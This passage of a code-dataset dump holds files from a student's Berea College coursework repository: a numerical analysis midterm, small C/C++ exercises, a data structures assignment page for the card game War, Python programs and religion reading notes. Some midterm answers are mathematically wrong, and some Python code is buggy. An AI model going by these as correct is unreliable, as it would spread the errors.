}while(true);\n return 0;\n}\n" }, { "alpha_fraction": 0.6377328634262085, "alphanum_fraction": 0.7209671139717102, "avg_line_length": 43.26315689086914, "blob_id": "4f5ccb9e511f4ed412e5d3052e5c0fd2ec23beb9", "content_id": "ccdfe034d68f1e50a4495c97ef9536515a659969", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2523, "license_type": "no_license", "max_line_length": 382, "num_lines": 57, "path": "/MAT 433 - Numberical Analysis/Midterm/Midterm.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# 1 \n```python:\nn_1 = input(\"numberator 1\")\nd_1 = input(\"denominator 1\")\nn_2 = input(\"numberator 2\")\nd_2 = input(\"denominator 2\")\n\nsame_base = d_2 * d_1\nn_1 = d_2 * n_1\nn_2 = d_1 * n_2\n\nnumberator_sum = n_1 + n_2\nwhole_number = floor(same_base/numberator_sum)\nremainder = numberator_sum - (same_base * whole_number)\nprint( whole_number, remainder/same_base)\n\n```\n\n\n# 3\nOn an eight bit system we need to break it up so that we can denote, positive and negative numbers. Also we need some kind of exponential to allow larger numbers, and we also need the base number as well. This could be done using the following format: \n\nS E E E B B B B\n\nS - Sign\nE - Exponent \nB - Base\n\nFurthermore, we can expand the size of the base by having an extra implicit base, so they obtain the form of 1.B B B B. This gives us 5 bits for the base.\n\nAlthough, we still need a method for representing the exponent in both as both positive or negative. We can represent the values by creating an offset based on the value of the exponent like so:\n\n000 -inf\n001 -2\n010 -1\n011 0\n100 1\n101 2\n110 3\n111 inf\n\nThis allows us to expand the base by 2^3. Thus in the largest number that could be formed, would be a positive number with the largest possible base and the largest exponent. This gives:\n\n0 1 1 0 1 1 1 1 -> This gives a positive number with a base of: 1.1111 since we have the implied extra 1. Then we have an exponent of 2, so this gives a value of +1111.1 or (2^4 - 1) + .5 = 15.5\nAs for the smallest it would be a negative number with the lowest possible base:\n0 0 0 1 0 0 0 0 -> This gives a base of 1.0000 along with an exponent with -2, thus .010000 giving a value of 2^-2 = .25 as the smallest value\n\nAs for the machine epsilon would be the smallest change possible from 1 thus it would be a positive number with a base of 1 and the minimum base. \nThis gives: 1 0 0 0 0 0 0 1: This gives a base of 1.0 0 0 1, with an exponent of 0 meaning the smallest shift is 2^-4 or +/-0.0625. \n\n# 4\nx = 10000000 is the most accurate. This is on account of the errors in representing the value -0.000001, which can not be represented in decimal without some kind of rounding while 1000000 can be represented accurately by 11110100001001000000. The ability to represent the data accurately, means that it does not start with a rounding error and starts more accurately than -0.00001.\nAlgebraically we can represent the value as:\nx^2 - 10^6x + 1*10^-6x - 1 = 0\nx(x - 10^6) + 10^-6(x - 10^6) = 0\n(x + 10^-6) + (x-10^6) =0 \nzeros are: -10^-6 and 10^6\n" }, { "alpha_fraction": 0.570135772228241, "alphanum_fraction": 0.6018099784851074, "avg_line_length": 23.55555534362793, "blob_id": "c88af3130476cf63baae1ad8858016610b8902a4", "content_id": "b12915029c98b9eaeaf8dc6d31eb2d114427ee3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 221, "license_type": "no_license", "max_line_length": 114, "num_lines": 9, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ext3.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int count = 99;\n while (count > 0){\n printf(\"%1$d beloved Bereans on the wall, %1$d beloved Bereans...take one down, with great renown,\\n\", count);\n count -= 1;\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6941362619400024, "alphanum_fraction": 0.7036449909210205, "avg_line_length": 40.93333435058594, "blob_id": "23f3d24c218991e5c56088f68a6a355aad1a9ae8", "content_id": "2d0e834406604cd08dfb55363b42f8f52ad436ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 631, "license_type": "no_license", "max_line_length": 92, "num_lines": 15, "path": "/CSC 236 - Software Design/IntrotoC++/helloworld.cpp", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\n/* Course: CSC 236 Introduction to Programming with C++\n Name: Jesson Soto\n Assignment A06: Hello world\n Description: This default C++ program types \"Hello world!\" on the screen\n All of the code in this program was generated by Code::Blocks */\n\n#include <iostream> //This statement includes the input/output library\n\nusing namespace std; //this is for the standard (std) namespace\n\nint main() //all C++ programs will begin with a main function\n{\n cout << \"Hello world!\" << endl; //cout stands for \"console output\"... \n return 0; //this returns control to the calling system and indicates no errors occurred.\n}\n\n" }, { "alpha_fraction": 0.5299538969993591, "alphanum_fraction": 0.557603657245636, "avg_line_length": 20.700000762939453, "blob_id": "4b07474a8fca9af99314e81927b1e022f32507b5", "content_id": "2b2991eafaba3a1c998c746f8acf4a04a1517ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 217, "license_type": "no_license", "max_line_length": 71, "num_lines": 10, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ext5.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int summation = 0;\n int count = 10;\n for(int i = 0; count >= i; i++){\n summation += i;\n }\n printf(\"The sum of the numbers 0 to %d is %d\\n\", count, summation);\n return 0;\n}\n" }, { "alpha_fraction": 0.5980681777000427, "alphanum_fraction": 0.6050748229026794, "avg_line_length": 54.2929573059082, "blob_id": "954b07c44b0fdd2d0eae69579efc00d091aaf6d6", "content_id": "2603d95074d095297f5cf89352227481fb7fca19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 19982, "license_type": "no_license", "max_line_length": 142, "num_lines": 355, "path": "/CSC 236 - Software Design/War/a11.stacks-queues.html", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\">\r\n <link rel=\"stylesheet\" href=\"../styles/csc236.css\" type=\"text/css\">\r\n <link href=\"../styles/csc236.css\" type=\"text/css\" rel=\"stylesheet\">\r\n <link rel=\"icon\" href=\"../images/favicon.ico\" type=\"image/x-icon\">\r\n <link rel=\"shortcut icon\" href=\"../images/favicon.ico\" type=\"image/x-icon\">\r\n <!--Force IE6 into quirks mode with this comment tag-->\r\n <title> Tasks | Data Structures | Berea College</title>\r\n <meta name=\"viewport\" content=\"width=device-width, minimum-scale=1.0, maximum-scale=1.0\">\r\n <!--[if lt IE 9]>\r\n <script src=\"scripts/html5.js\"></script> <![endif]-->\r\n <script type=\"text/javascript\" src=\"../scripts/respond.min.js\"></script>\r\n </head>\r\n <body>\r\n <div id=\"wrapper\">\r\n <header>\r\n <nav id=\"skipTo\">\r\n <ul>\r\n <li> <a href=\"#main\" title=\"Skip to tasks\">skip to tasks</a> </li>\r\n </ul>\r\n </nav>\r\n <hr>\r\n <h1>CSC 236 Data Structures</h1>\r\n <nav>\r\n <ul>\r\n <li><a href=\"../index.html\" title=\"tasks\">TASKS</a></li>\r\n <li><a href=\"../resources.html\" title=\"resources\">RESOURCES</a></li>\r\n <li><a href=\"../about.html\" title=\"about\">ABOUT</a></li>\r\n <li><a href=\"http://moodle2.berea.edu\" title=\"Moodle2\" target=\"_blank\">MOODLE2</a></li>\r\n </ul>\r\n </nav>\r\n <div id=\"logo\"> <img src=\"../images/bc-tree.png\" alt=\"csc236 logo\">\r\n <hr> </div>\r\n </header>\r\n <br>\r\n <!-- end header -->\r\n <div id=\"main\"> <br>\r\n <h3> A11: Stacks, Queues, and the Card Game War</h3>\r\n <p> First a bit about stacks and queues...</p>\r\n <h4>Queues</h4>\r\n <p>A <em><strong>queue</strong></em> is an important data structure\r\n that orders items according to when they arrive. Hence, the ordering\r\n of a queue is first in, first out (FIFO). When you wait in that long\r\n line to get into Berea's food service, you are in a queue. In fact,\r\n British English speakers don't say \"wait in line\", they say \"wait on\r\n queue.\" <br>\r\n <br>\r\n We have seen a Queue ADT implemented in Python in our text in a\r\n simulation of waiting times at a cash register. In addition, your\r\n instructors have created a simpler example which used the Queue ADT\r\n that builds a story word by word. <br>\r\n <br>\r\n Please download these files, run them and try to understand them:</p>\r\n <ul>\r\n <li><a target=\"_blank\" href=\"queue_example_py.zip\">queue_example_py.zip</a></li>\r\n <li><a target=\"_blank\" href=\"simulaton_example_py.zip\">simulaton_example_py.zip</a></li>\r\n </ul>\r\n <br>\r\n <h4>Stacks</h4>\r\n <p>A useful data structure called a stack models a real-world stack of\r\n items in which you can only safely add or remove an item from the top\r\n of a stack. A stack is also referred to as a last in, first out (LIFO)\r\n data structure. <br>\r\n <br>\r\n Our text gave the example of using a stack to match bracket types in\r\n an expression which includes ( ), [ ], { } like:</p>\r\n <div class=\"indent\" style=\"margin-top:-10px\"><code>{(2+x)/4-}-[(x-4)*(x+1)}</code></div>\r\n <p> The following code is modified to make it more understandable.\r\n Please download it and try to understand it:</p>\r\n <ul>\r\n <li><a target=\"_blank\" href=\"stack_example_py.zip\">stack_example_py.zip</a></li>\r\n </ul>\r\n <br>\r\n <h3>The War Car Game</h3>\r\n <p>We will be putting these ideas to use in the card game called \"War.\"</p>\r\n <h3>The deck</h3>\r\n <p>In this card game, we will use multiple decks of cards of the type in\r\n the image above. Each of the cards in these special decks of cards has\r\n a number between 0 and 9 on its face, so the value of each card can be\r\n represented by an integer. Hence one deck has only 10 cards: 0, 1, 2,\r\n 3, 4, 5, 6, 7, 8, and 9. <img style=\"max-width:100%; width:auto; height:auto; margin-top:10px\"\r\r\n alt=\"Modified UNO Cards\" src=\"../images/uno-number-cards.jpg\"> This\r\n game will use 5 sets of these decks.</p>\r\n <h4>Playing Piles and Storage Piles</h4>\r\n <p> This game uses six \"piles\" of cards during the game. Each player\r\n will have their own <strong>playing pile</strong> of cards and their\r\n own <strong>storage pile</strong> of cards. There is a single common\r\n <strong>loot pile</strong> in the center of the table. The dealer (who\r\n is not a player) also has a <strong>dealing pile</strong>. All piles\r\n will start out empty. Each pile will be represented by either a queue\r\n or a stack because addition, removal, and access can only occur at an\r\n end.</p>\r\n <h4>Dealing</h4>\r\n <p> Prior to starting the rounds of play, the dealer will pick up 5 new\r\n shrink-wrapped decks of cards from the dealer's cabinet, which the\r\n dealer will unwrap and shuffle. (Note that this is an important\r\n detail, as shuffling is not a standard feature of either the Stack or\r\n Queue classes.) After shuffling the cards, the dealer will add them\r\n one by one to the top of the <strong>dealing pile</strong>. <br>\r\n <br>\r\n Next, 50 cards will be dealt one by one from the top of the dealing\r\n pile to the top of each <strong>playing pile</strong> alternating\r\n between playing piles. <em>Hint: The fact that the <b>top</b> of the\r\n dealing pile is there cards are added and removed should tell you\r\n which data structure to use for this pile.</em> <br>\r\n <br>\r\n After the cards are dealt, there will be 25 cards in each playing\r\n pile. These cards are kept face-down in the respective playing piles.\r\n Neither player may look at the cards in these playing card piles, and\r\n the storage piles for both players will be empty. </p>\r\n <h4>Beginning <span style=\"font-style: italic;\"></span>Play</h4>\r\n <p> In each roun<span style=\"font-style: italic;\"><span style=\"font-weight: bold;\"></span></span>d\r\n of play, both players will (essentially simultaneously) remove a card\r\n from the top of their playing piles, displaying them face-up on the\r\n table where they can be seen by both players.&nbsp; <em>Hint: The\r\n fact that cards can only be added to and removed from the <strong style=\"text-decoration: underline;\">top\n </strong>of the playing piles should sufficient information to\r\n determine which data structure to use for the playing piles.</em></p>\r\n <h4> Refilling the Playing Pile</h4>\r\n <p>Whenever a player's playing pile becomes empty, her or she will\r\n immediately try to refill her playing pile by completely emptying his\r\n or her storage pile. The newly refilled playing pile should have the\r\n cards in the same order as the existing storage pile.&nbsp; But, the\r\n cards must be moved one by one.&nbsp;<em> Hint: Since the playing\r\n piles can only be added to on the top, this should be enough\r\n information to help you decide what data structure to use for the\r\n storage piles.</em></p>\r\n <h4>Each Round of Play</h4>\r\n <p> In each round of play:<br>\r\n </p>\r\n <ul>\r\n <li> If one player displays a higher ranking card, he or she will\r\n collect both of the displayed cards, and will add them one at a time\r\n to the top of his or her storage pile. </li>\r\n <li>If both players display cards of the same value (eg. each player\r\n displays a 9 card), this will start a \"War\" in this round of play.\r\n When \"War\" breaks out, the following happens:\r\n <ol style=\"list-style-type: upper-roman;\">\r\n <li>The single loot pile located in the middle of the table will\r\n be used, and the two cards of the same value will be added to\r\n the top of the loot pile. </li>\r\n <li> Both players will then remove an additional card from the top\r\n of their playing pile and add them to the top of the loot pile\r\n without looking at them. </li>\r\n <li> Then each player will remove one additional card from his or\r\n her playing pile, and will display it face-up on the table.\r\n These two newly displayed cards will determine what happens\r\n next:\r\n <ol style=\"list-style-type: upper-alpha;\">\r\n <li> If these newly displayed cards differ, the player who\r\n displayed the higher ranking card will win all six cards\r\n (the two displayed cards as well as the four cards currently\r\n in the loot pile). These six cards must be added one by one\r\n to the winner's storage pile, while the central loot pile is\r\n emptied. Note that the cards must retain the same order in\r\n the storage pile as their order in the loot pile.<em> Hint:\r\n This should help you to determine which data structure to\r\n use for the loot pile </em><em>since cards are only added\r\n at the top of the loot pile and order must be maintained\r\n as they are transferred one by one to the storage pile.<br>\r\n </em></li>\r\n <li> If these two newly displayed cards are two more\r\n identically numbered cards, the state of \"War\" will continue\r\n (You will repeat starting at back at roman number I. i.e.\r\n These two cards will be added to the loot pile....) <br>\r\n The loot pile will continue to grow until there is a winner\r\n who will take the two displayed cards as well as the entire\r\n loot pile, removing all of the cards from the loot pile one\r\n by one and adding all of these cards to his or her storage\r\n pile until the loot pile is empty. </li>\r\n </ol>\r\n </li>\r\n </ol>\r\n </li>\r\n </ul>\r\n <br>\r\n <h4> On Winning</h4>\r\n <p> If a player's playing pile and storage pile both become empty at the\r\n same time, he or she had run out of cards and immediately loses the\r\n game. In other words, rounds of play continue until one player has all\r\n 50 of the original cards. </p>\r\n <h4> An Additional Hint </h4>\r\n <p>The random library contains a shuffle function.</p>\r\n <div style=\"margin-top:-10px; margin-left:40px\"> <code>import random<br>\r\n random.shuffle(cardset) <span class=\"comment\"># might be useful to\r\n the dealer</span></code></div>\r\n <br>\r\n <hr> <br>\r\n <h3> Assignment Specifics </h3>\r\n <p> This assignment is to be completed individually or in pairs (your\r\n choice!!) <br>\r\n If you decide to work with a partner, be sure to follow good \"<a href=\"http://cs.berea.edu/courses/csc226/CSC226PairProgram.pdf\"\r\r\n target=\"_blank\">pair-programming</a>\" practices as you did for\r\n CSC226. <br>\r\n <br>\r\n Write a Python program that employs the provided Stack and Queue\r\n classes to implement the Game of War as described above. In your\r\n implementation, the user will play against the computer. Note that the\r\n implementation of the game should be done using only the standard\r\n features of each of these data structures. <br>\r\n <br>\r\n After each action, your program should print (or otherwise display)\r\n the values of the cards which are displayed in that round of play, and\r\n should state what happens (such as \"You win!\" or \"Two 5's displayed so\r\n War breaks out\".) Have fun with your program. <br>\r\n <br>\r\n Here are some requirements: </p>\r\n <ol>\r\n <li> Your program MUST use the Stack and Queue classes provided with\r\n the examples above to implement each of the needed piles of cards.</li>\r\n <br>\r\n <li> You MUST create your own new class and driver modules for this\r\n game.</li>\r\n <br>\r\n <li> You MUST document your code effectively with the appropriate\r\n docstrings and comments interspersed with your source code.</li>\r\n </ol>\r\n <p>You might find the following prototype design notion useful, but you\r\n may vary from this design if you choose.</p>\r\n <div class=\"indent\" style=\"margin-top:-10px\">\r\n <pre><span class=\"keyword\">class</span> War:\r\n \r\n <span class=\"comment\"># possibly useful instance variables</span>\r\n <span class=\"keyword\">self</span>.myCurrent <span class=\"comment\"># my currently displayed card</span>\r\n <span class=\"keyword\">self</span>.otherCurrent <span class=\"comment\"># other currently displayed card</span>\r\n <span class=\"keyword\">self</span>.currentState <span class=\"comment\"># keeps track of the state of play</span>\r\n <span class=\"keyword\">self</span>.dealingPile <span class=\"comment\"># queue or stack</span>\r\n <span class=\"keyword\">self</span>.myPayingPile <span class=\"comment\"># queue or stack</span> \r\n <span class=\"keyword\">self</span>.myStoragePile <span class=\"comment\"># queue or stack</span>\r\n <span class=\"keyword\">self</span>.otherPlayingPile <span class=\"comment\"># queue or stack</span> \r\n <span class=\"keyword\">self</span>.otherStoragePile <span class=\"comment\"># queue or stack</span>\r\n <span class=\"keyword\">self</span>.lootPile <span class=\"comment\"># queue or stack</span>\r\n\r\n War() \r\n <span class=\"comment\"># Constructor initializes all instance variables</span>\r\n\r\n add_dealingPile()\r\n <span class=\"comment\"># adds the shuffled decks of cards to the dealer's pile</span>\r\n \r\n deal()\r\n <span class=\"comment\"># deals out 25 cards from to each player's playing pile from shuffled dealers pile</span>\r\n\r\n make_move()\r\n <span class=\"comment\"># initiates a round of play and communicates play-by-play during the round\r\n # returns true when the game is still in play\r\n # returns false when the game is over\r\n # Communicates an appropriate message about whether the user beat the computer</span>\r\n\r\n remove_my_card()\r\n <span class=\"comment\"># Precondition: myPlayingPile is not empty \r\n # If it is not empty, the function removes a card from myPlayingPile, \r\n # returning the stored value</span>\r\n \r\n remove_other_card()\r\n <span class=\"comment\"># Precondition: otherPlayingPile is not empty \r\n # If it is not empty, the function removes a card from otherPlayingPile,\r\n # returning the stored value</span>\r\n \r\n display_card()\r\n <span class=\"comment\"># displays a card on the screen and returns the value</span>\r\n \r\n compare_cards()\r\n <span class=\"comment\"># compares myCurrent to otherCurrent and behaves appropriately </span> \r\n \r\n move_my_loot()\r\n <span class=\"comment\"># moves everything from lootPile to myStoragePile</span> \r\n \r\n move_other_loot()\r\n <span class=\"comment\"># moves everything from lootPile to otherStoragePile</span>\r\n \r\n move_my_storage()\r\n <span class=\"comment\"># moves everything from myStoragePile to myPlayingPile</span>\r\n \r\n move_other_storage()\r\n <span class=\"comment\"># moves everything from otherStoragePile to otherPlayingPile</span></pre>\r\n </div>\r\n <br>\r\n <h3>A11 Reflection: </h3>\r\n Please create a new reflection document entitled <em>yourusername</em>-A11.docx.\r\n This reflection document is intended to help you think about how to\r\n decide when a stack, queue or other data structure is best for a\r\n specific need in the program.This reflection is to be completed\r\n individually (or with your pair-partner), though consultations with TAs\r\n and classmates are encouraged as long as they are appropriately\r\n acknowledged.<br>\r\n <br>\r\n This assignment is intended for you to work with stack and queues in\r\n order to play the game of \"War\". Although there are several data\r\n structures that CAN be used to implement the game, there are certain\r\n ones that are the most appropriate.<br>\r\n <br>\r\n Please respond to each of the prompts below.<br>\r\n <br>\r\n <ol>\r\n <li>For each pile listed below, which data structure did you decided\r\n to use and what was the reason for the choice? Do not use the hints\r\n in the assignment webpage as an explanation, but instead focus on\r\n the operations that you needed and how the data structure supports\r\n them.<br>\r\n <ol type=\"a\">\r\n <li>dealing pile</li>\r\n <li>a player's playing pile</li>\r\n <li>a player's storage pile</li>\r\n <li>the opponent's playing pile</li>\r\n <li>the opponent's storage pile</li>\r\n <li>loot pile</li>\r\n </ol>\r\n </li>\r\n <li>Precisely describe what the data structure should be for the\r\n initial pile that needs to be shuffled, and why it may or may not be\r\n different from the data structure for the dealing pile.</li>\r\n <li> Most design choices have advantages as well as disadvantages.\r\n Describe the primary advantages of using a stack or a queue data\r\n structure, which is admittedly restricted in how you would use it,\r\n versus a Python list for the last three piles in the list above.</li>\r\n <li>Describe at least one disadvantage of using a stack or a queue\r\n data structure, versus a Python list for the last three piles in the\r\n list above.</li>\r\n <li>Imagine you are in a hackathon where you are restricted to using a\r\n single data structure for all of the piles and you have to choose\r\n between using all stacks and using all queue.&nbsp; Explain whether\r\n you would choose all stacks or all queues if you want to have the\r\n smallest impact on how the game functioned?&nbsp; Explain what\r\n changes and why you made the choice you did.&nbsp; </li>\r\n </ol>\r\n <h3><br>\r\n </h3>\r\n <h3>On A11: Documenting, saving, and submitting your files</h3>\r\n <br>\r\n <h4>To submit:</h4>\r\n <ol>\r\n <li> Create a folder called <i>yourusername-csc236A11</i> </li>\r\n <li> Copy your program files into it. (all classes in addition to the\r\n driver file)</li>\r\n <li> Copy your completed reflection document <em>yourusername</em>-A11.docx\r\n into this folder. </li>\r\n <li> Zip this directory and submit your zipfile, <i>yourusername-csc236A11.zip</i>,\r\n onto Moodle when you are done. </li>\r\n </ol>\r\n <!-- footer: do not remove the weird-looking div you see next. It is important to push the footer to the bottom of some browsers. -->\r\n <div id=\"footer\"> <br>\r\n <br>\r\n <hr>\r\n <p> Copyright © 2016 | Licensed under a Creative Commons\r\n Attribution-Share Alike 3.0 United States License |\r\n http://cs.berea.edu/CSC236/</p>\r\n </div>\r\n </div>\r\n </div>\r\n </body>\r\n</html>\r\n" }, { "alpha_fraction": 0.5355600118637085, "alphanum_fraction": 0.5402126908302307, "avg_line_length": 29.704082489013672, "blob_id": "aaee9401674ff643da817a3167c97c952fb6627a", "content_id": "2913cc983f560215ba8575351d478d55c44ab408", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6018, "license_type": "no_license", "max_line_length": 106, "num_lines": 196, "path": "/CSC 236 - Software Design/AnimalGuessingGame/working.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated by: Jesson Soto Ventura\nFinds all the mnemonics formed by a set of numbers\nA14\n\"\"\"\nimport json\n\ndef recursivemnemonics(word):\n \"\"\"\n Returns the next iteration on a word provided.\n Pre:\n A string that will be incremented\n Post:\n An incremented string along with an indicator of whether the cycle has been complemeted or not\n \"\"\"\n\n # Check the length of the word.\n # A word of length 1 is our base\n if len(word) != 1:\n\n # Get strip the first letter off the word and call itself\n stripped_word = word[1:]\n stripped_letter = word[0]\n\n # Increment the stripped_word\n is_end_of_cycle, next_word= recursivemnemonics(stripped_word)\n\n # Decide what to return\n if is_end_of_cycle:\n # For end of cycles incremented the first letter as well\n # Then return\n is_end_of_cycle, next_letter = get_next_letter(stripped_letter)\n return (is_end_of_cycle, next_letter + next_word)\n else:\n # Return only the incremented with the same first letter\n word = stripped_letter + next_word\n return (is_end_of_cycle, word)\n else:\n return get_next_letter(word)\n\ndef listmnemonics( word):\n \"\"\" Creates a list of the mnemonics returned by recursivemnemonics\n pre: A valid word to start the cycle with.\n post: A list of all the mnemonics formed from that word\n \"\"\"\n\n sequences = list()\n\n # Get the next sequence after the given word.\n is_end_of_cycle, next_sequence = recursivemnemonics(word)\n\n # Store the the sequence that follows it.\n sequences.append(next_sequence)\n\n # Continue storing the next sequence until the basecase has reached the end of its cycle\n while not is_end_of_cycle:\n is_end_of_cycle, next_sequence = recursivemnemonics(next_sequence)\n sequences.append(next_sequence)\n return(sequences)\n\n\ndef get_next_letter(letter):\n \"\"\" Returns the next letter in the cycle\n Parameters:\n letter - The letter to be advanced\n Pre:\n A single letter\n Post:\n A tuple indicating if the cycle started over along with the\n next letter in the cycle\n \"\"\"\n\n cycle = {\"A\":(False, \"B\"),\n \"B\":(False, \"C\"),\n \"C\":(True, \"A\"),\n \"D\":(False, \"E\"),\n \"E\":(False, \"F\"),\n \"F\":(True, \"D\"),\n \"G\":(False, \"H\"),\n \"H\":(False, \"I\"),\n \"I\":(True, \"G\"),\n \"J\":(False, \"K\"),\n \"K\":(False, \"L\"),\n \"L\":(True, \"J\"),\n \"M\":(False, \"N\"),\n \"N\":(False, \"O\"),\n \"O\":(True, \"M\"),\n \"P\":(False, \"Q\"),\n \"Q\":(False, \"R\"),\n \"R\":(False, \"S\"),\n \"S\":(True, \"P\"),\n \"T\":(False, \"U\"),\n \"U\":(False, \"V\"),\n \"V\":(True, \"T\"),\n \"W\":(False, \"X\"),\n \"X\":(False, \"Y\"),\n \"Y\":(False, \"Z\"),\n \"Z\":(True, \"W\"),\n }\n return cycle[letter]\n\ndef convert_number(number):\n \"\"\" Converts the given number to the first mnemonics\n Pre:\n A number as a string\n Post:\n The first mnemonic created with that string\n or invalid sequence if there is a 0 or 1 in the\n number.\n \"\"\"\n # The conversion between letters and number\n convert = {'2':\"A\", '3':\"D\", '4':\"G\",\n '5':\"J\", '6':\"M\", '7':\"P\",\n '8':\"T\", '9':\"W\"}\n word = str()\n\n # Step through all the numbers for any non valid number\n # return invalid sequence\n for digit in number:\n if digit in convert:\n word += convert[digit]\n else:\n return \"Invalid Sequence\"\n\n # Return the mnemonic\n return word\n\n\ndef main ():\n \"\"\" Displays all the mnemonics that can formed from a given number\n Pre:\n None\n Post:\n All the mnemonics that can be formed\n \"\"\"\n # Convert the number given by the user to a valid strong.\n number = raw_input(\"Enter a number: \")\n word = convert_number(number)\n\n # For a invalid sequence print invalid.\n if word != \"Invalid Sequence\":\n sequences = listmnemonics(word)\n sequences = get_valid_words(sequences)\n print(str(sequences))\n else:\n print (\"Invalid Number\")\n\ndef get_valid_words(all_words):\n word_file = open(\"valid_words.txt\", \"rw\")\n seek_positions = open(\"seek_positions.json\", \"rw\")\n valid_words = list()\n\n # Create a json from the file.\n word_locations = json.load(seek_positions)\n current_letter = all_words[0]\n found_word = \"\"\n while len(all_words) > 0:\n test_word = all_words[0].lower()\n if test_word[0] != current_letter:\n current_letter = test_word[0]\n start_position = word_locations[current_letter]\n word_file.seek(start_position)\n else:\n if found_word > test_word:\n all_words.remove(all_words[0])\n elif test_word == found_word:\n valid_words.append(test_word)\n all_words.remove(all_words[0])\n elif found_word < test_word:\n found_word = word_file.readline().lower()[:-2]\n\n return valid_words\n\ndef get_letter_locations():\n word_locations = open(\"seek_positions.json\", \"w\")\n word_file = open(\"valid_words.txt\", \"rb\")\n locations = dict()\n current_letter = \"a\"\n counter = 0\n for line in word_file:\n\n if current_letter == line[0].lower():\n locations[current_letter] = counter\n current_letter = chr(ord(current_letter) + 1)\n\n counter += len(line)\n\n for key in locations:\n word_file.seek(locations[key])\n line = word_file.readline()\n print(line,key)\n\n word_locations.write(json.dumps(locations, sort_keys=True, indent=4, separators = (',',': ')))\n\n\nmain()\n" }, { "alpha_fraction": 0.7046138644218445, "alphanum_fraction": 0.7046138644218445, "avg_line_length": 57.617645263671875, "blob_id": "8e461b9c4460f03e924788105b72573909170c0b", "content_id": "2f7c01a1bf851c19511e54b96d9943ce198174ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1994, "license_type": "no_license", "max_line_length": 135, "num_lines": 34, "path": "/GSTR 310 - Religion and Christianity/Quest For The Living God/Chapter 4.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Wreched Poverty\n * Poverty is the result of political, economic, and cultural institations working together to dehumize people\n * The Poor:\n * Faces of young children with physical and metal deficiencies\n * Children in cities, often sexually exploited\n * young people not being given opporunity to build future\n * indigenous people\n * pesentes deprived of land\n * old people no longer able to work\n\n# Intuition of God's Presence and Action\n * The poor believe in God's will and that poverty is allowed\n * This is the result of Christ being in a similar situation to us.\n * This results in the belif that waiting out pain leads to heaven\n * God is thus an integral part of the impoverished\n * Unity amoust the poor causes them to arise with the idea of God's Preferential option for the poor\n * He prefers the poor not because of sin, but because he wants all to flourish and as such must help them more\n # The Hebrew Bible\n * Depicts God on the poor's side not the pharoh's a shift from typical views\n * Argues that God loves the poor, because he wants to watch the world thrive\n * Bible never shows God as angry, he is always mercyful for longer\n # New Testment\n * Women also seek God as a source of confort\n * Again Jesus comes up to show that the poor suffers will rejoice upon death\n # God as an idol\n * Maining relations with God entitles giving up false idols:\n * These include money, sex, drugs ... \n * Through saying that giving up false idols, the poor see themselves as being saved by God\n * God loves all and his prefrentail love is only done in an effort to even out the abuse of some although his love is universal\n\nQuestion:\n What does it mean to be a wealth christian\n How does this view impact mega-churches or celebrity pastors\n Is the idea that God favors the poor a ploy by the wealth to control the poor\n\n" }, { "alpha_fraction": 0.584482729434967, "alphanum_fraction": 0.584482729434967, "avg_line_length": 24.217391967773438, "blob_id": "3a8be72bd0ae7a6858afc8305ef654f2583aa754", "content_id": "9e724c8d5f80dcf03d32147176e661b1384ddfa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 580, "license_type": "no_license", "max_line_length": 94, "num_lines": 23, "path": "/CSC 236 - Software Design/PetSimulator/main.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from simulator import Simulator\n\ndef main():\n \"\"\"\n Starts the simulator and reports out what the owner did on that day\n \"\"\"\n print (\"Welcome to a pet simulator. It will simulate a person taking care of thier pets.\")\n years = None\n try:\n years = raw_input(\"How many years should the simulator run: \")\n years = int(years)\n except:\n print(\"Invalid input.\")\n \n if type(years) is int:\n sim = Simulator()\n sim.start_simulation(years)\n else:\n print(\"Invalid input.\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.522002637386322, "alphanum_fraction": 0.5378128886222839, "avg_line_length": 27.10370445251465, "blob_id": "e45559c69b2250c544990c5937eaad1616151068", "content_id": "ca82e8d5aee006f77e33e5985940a990c74929de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3795, "license_type": "no_license", "max_line_length": 91, "num_lines": 135, "path": "/CSC 486 - Parallel and Distributed Systems/jacobi_sotoventuraj.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nJesson Soto\njacobi\n\n\"\"\"\n\ndef empty_matrix(source, headers):\n empty = list()\n empty.append(source[0])\n rows = headers[0] - 1\n columns = headers[0] - 1\n for y in range(1, rows):\n temp_row = list()\n temp_row.append(source[y][0])\n for x in range(1, columns):\n temp_row.append(None)\n temp_row.append(source[y][-1])\n empty.append(temp_row)\n empty.append(source[-1])\n return empty\n\n\ndef jacobi (source, headers):\n \"\"\" Takes the values from the source and produces a new\n list of vaules that have had the jacobi algorithmn preformed\n on them.\n\n Args:\n source - The source list (2D), with only the data points.\n headers - A tuple of the x and y values\n\n Returns:\n A list containing the new values, the values are a mix of strings and ints.\n \"\"\"\n\n # Find the bounds\n max_rows 